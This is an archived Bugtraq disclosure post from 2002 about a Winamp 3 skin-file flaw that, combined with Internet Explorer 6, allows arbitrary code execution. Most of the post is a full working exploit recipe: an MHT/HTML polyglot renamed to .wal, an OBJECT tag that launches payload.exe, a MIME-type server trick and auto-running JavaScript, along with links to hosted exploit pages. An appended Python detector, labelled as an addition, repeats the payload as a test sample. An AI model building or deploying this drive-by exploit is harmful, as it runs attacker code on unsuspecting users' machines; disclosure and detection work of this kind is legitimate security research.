Bugtraq mailing list archives
RETRY : newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6
From: "Jelmer" <jelmer () kuperus xs4all nl>
Date: Sat, 17 Aug 2002 20:36:17 +0200
This one was missed by SecurityFocus. Let's try again -- jelmer

----- Original Message -----
From: "Jelmer" <jelmer () kuperus xs4all nl>
To: <bugtraq () securityfocus com>
Sent: Sunday, August 11, 2002 1:28 AM
Subject: newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6
For those of you who have been living under a rock, Winamp 3 final was released today. It features freeform skins, now plays videos, allows you to manage your mp3s and a lot more. Unfortunately they failed to address a pretty serious arbitrary code execution vulnerability when combined with Internet Explorer that I reported to them and this list earlier concerning Winamp 2. I haven't heard from them since.

Winamp 3 uses a new skinning system that uses the .wal extension. This skin type is also opened automatically in MSIE; it doesn't prompt for download and stores the file in a known location on the user's hard disk, namely C:\Program Files\Winamp3\Skins (when installed in the default location, like most people do).

Working exploit code is available at http://kuperus.xs4all.nl/winamp3.htm

Note that this version DOES NOT use any unpatched MSIE hole to invoke the executable and it will continue to work even after Microsoft patches its browser. As I understand it this is just the way the object tag behaves in the local zone (which seems very very dangerous to me). I also updated the Winamp 2 exploit code at http://kuperus.xs4all.nl/winamp.htm

Ok, to encourage Winamp/AOL to take their customers' security a bit more seriously, here's "the recipe" for how it's done. It's kind of "http-equiv-esque" in length and obscurity and may not be for the faint of heart. It's written from the top of my head, so please forgive me if I missed a brace or dot here and there. Here goes.

Create a directory c:\exploit and place an exe file in it, let's call it payload.exe. Then create a file called exploit.htm and give it the following contents:

<html>
<body>
<img src="payload.exe">
</body>
</html>

Open the file in Internet Explorer, choose File > Save As, and save it as exploit.mht. Open it in Notepad and add the following line to the top:

<html style="display:none;">

so it looks like this:

<html style="display:none;">
From: <Saved by Microsoft Internet Explorer 5>
Subject:
Date: Mon, 5 Aug 2002 18:30:03 +0200
MIME-Version: 1.0

Then look for the body section of this html document (it looks a little mangled), delete everything between the body tags and place an object tag in its place, so it looks like this:

<META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
<BODY>
<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="mhtml:file:///C:/Program%20Files/winamp3/Skins/amp.wal!file:///c:/exploit/payload.exe"></OBJECT>
</BODY></HTML>

This is the code that will later be used to invoke our executable. What we have done is slightly alter the mht file so that it can be viewed both as an html and as an mht file. Files starting with an <html> tag are always seen as html files in Internet Explorer (which can be a pain, as will be described below).

Ok, we are set to go. Now we want to place this on the user's hard disk. We know wal files are opened automatically by Winamp 3 and placed in a known location, so we'll rename our exploit.mht file to .wal. Unfortunately Internet Explorer disrespects MIME types, so by having added an <html> tag to the mht file it tries to open it as an html file. The only way I found around this is to set the MIME type to a value MSIE doesn't know. I chose x-foo/x-bar. If you are using Apache you can add the following to your mime.types file:

x-foo/x-bar wal

This means that the webserver will pass this MIME type along with every file requested ending in .wal. When we now request this file it will be opened by Winamp 3 and an error message will follow shortly; however, at that time it is already too late, our exploit.wal file has been placed in C:\Program Files\Winamp3\Skins\exploit.wal.

Now all that remains is bringing it together by making the following sequence of events occur:

1. download our exploit.wal
2. wait a few seconds for it to finish downloading, then call exploit.wal as an html file (the file also doubles as an mht file and the object tag included in the html portion points to itself as the codebase)

Here's the code for this:

<html>
<body>
Waiting for 5 seconds..
<!-- download our renamed mht file and place it on the user's disk -->
<iframe src="amp.wal" style="display:none"></iframe>
<script language="javascript">
// wait for 5 seconds
setTimeout("ExecuteFile()", 5000);
function ExecuteFile() {
  // open the saved wal file as html file
  // oddly when called from disk it didn't open it as html file so we need to
  // force this behaviour by using a modeless dialog
  sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal';
  sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px; dialogheight: 0px; status:no; unadorned:yes; help:no';
  vReturnValue = window.showModelessDialog(sHTML, '', sFeatures);
}
</script>
</body>
</html>

have fun -- jelmer
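As an added, defender-side example that is not part of the original post: a small Python check that flags a file in the Winamp skins folder showing the polyglot shape described above (an <html> tag ahead of the MHTML mail headers, plus an OBJECT whose CODEBASE is an mhtml: URL whose "!" part points at a local file:/// path). The sample blobs are constructed here; the assumption that a genuine .wal skin is a zip archive is mine, not the post's.

```python
import re

# Indicators of the "html-first" MHTML polyglot described in the post.
HTML_FIRST = re.compile(rb'^\s*<html', re.IGNORECASE)
MHT_HEADER = re.compile(rb'^(From|MIME-Version|Content-Type):',
                        re.IGNORECASE | re.MULTILINE)
# OBJECT tag with CODEBASE="mhtml:<container>!file:///<local path>"
MHTML_LOCAL_CODEBASE = re.compile(
    rb'<object[^>]*codebase\s*=\s*["\']?mhtml:[^"\'>]*!file:///',
    re.IGNORECASE | re.DOTALL)


def inspect_skin_file(data: bytes) -> dict:
    """Return which polyglot indicators are present in a .wal/.mht blob.

    'looks_like_zip' assumes a real Winamp 3 skin is a zip container
    (local file header 'PK\\x03\\x04'); an HTML/MHTML body is not one.
    """
    findings = {
        "looks_like_zip": data.startswith(b"PK\x03\x04"),
        "html_first": bool(HTML_FIRST.search(data[:512])),
        "mht_headers": bool(MHT_HEADER.search(data[:2048])),
        "mhtml_local_codebase": bool(MHTML_LOCAL_CODEBASE.search(data)),
    }
    # A self-referencing mhtml: codebase alone is enough to flag; so is the
    # html-tag-before-mail-headers trick even without the OBJECT tag.
    findings["suspicious"] = findings["mhtml_local_codebase"] or (
        findings["html_first"] and findings["mht_headers"])
    return findings


# Constructed samples: the post's polyglot layout, and a zip-like benign skin.
POLYGLOT_SAMPLE = (
    b'<html style="display:none;">\r\n'
    b'From: <Saved by Microsoft Internet Explorer 5>\r\n'
    b'Subject: \r\nMIME-Version: 1.0\r\n\r\n'
    b'<HTML><HEAD></HEAD><BODY>\r\n'
    b'<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"\r\n'
    b'CODEBASE="mhtml:file:///C:/Program%20Files/winamp3/Skins/amp.wal'
    b'!file:///c:/exploit/payload.exe"></OBJECT>\r\n</BODY></HTML>\r\n'
)
BENIGN_SAMPLE = b"PK\x03\x04" + b"\x00" * 26 + b"skin.xml"

if __name__ == "__main__":
    for name, blob in (("polyglot", POLYGLOT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, inspect_skin_file(blob))
```

In practice the same check can be run over every file that lands in C:\Program Files\Winamp3\Skins, since that drop location is fixed by the default install.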